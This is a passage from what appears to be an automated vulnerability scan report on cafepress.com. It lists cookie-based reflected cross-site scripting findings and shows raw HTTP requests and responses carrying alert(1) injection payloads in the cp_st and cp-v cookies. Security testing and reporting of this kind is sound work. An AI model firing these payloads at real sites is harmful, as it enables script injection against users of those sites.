tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 112228 Date: Sun, 26 Dec 2010 13:48:09 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 112228 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd8dde"-alert(1)-"0740f775c1c "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.117. http://www.cafepress.com/make/custom-t-shirts [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-t-shirts
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ba57</script><script>alert(1)</script>0e63e38f264 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-t-shirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=8ba57</script><script>alert(1)</script>0e63e38f264 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 112251 Date: Sun, 26 Dec 2010 13:48:03 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 112251 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '8ba57</script><script>alert(1)</script>0e63e38f264 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.118. http://www.cafepress.com/make/custom-thermos [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-thermos
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eea1"-alert(1)-"d0c14b83f86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8eea1"-alert(1)-"d0c14b83f86 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 55394 Date: Sun, 26 Dec 2010 13:48:17 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55394 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8eea1"-alert(1)-"d0c14b83f86 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.119. http://www.cafepress.com/make/custom-thermos [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-thermos
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc081</script><script>alert(1)</script>a5d7c25c9aa was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=cc081</script><script>alert(1)</script>a5d7c25c9aa ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 55416 Date: Sun, 26 Dec 2010 13:48:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55416 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'cc081</script><script>alert(1)</script>a5d7c25c9aa ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.120. http://www.cafepress.com/make/custom-water-bottles [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-water-bottles
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67f7b"-alert(1)-"cf8efdc4007 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA67f7b"-alert(1)-"cf8efdc4007 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 58828 Date: Sun, 26 Dec 2010 13:48:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58828 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA67f7b"-alert(1)-"cf8efdc4007 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.121. http://www.cafepress.com/make/custom-water-bottles [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-water-bottles
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bca4a</script><script>alert(1)</script>d8d616836de was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=bca4a</script><script>alert(1)</script>d8d616836de ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 58850 Date: Sun, 26 Dec 2010 13:48:19 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'bca4a</script><script>alert(1)</script>d8d616836de ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.122. http://www.cafepress.com/make/holiday-invitations [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/holiday-invitations
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9671b"-alert(1)-"c603f1ee3b3 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
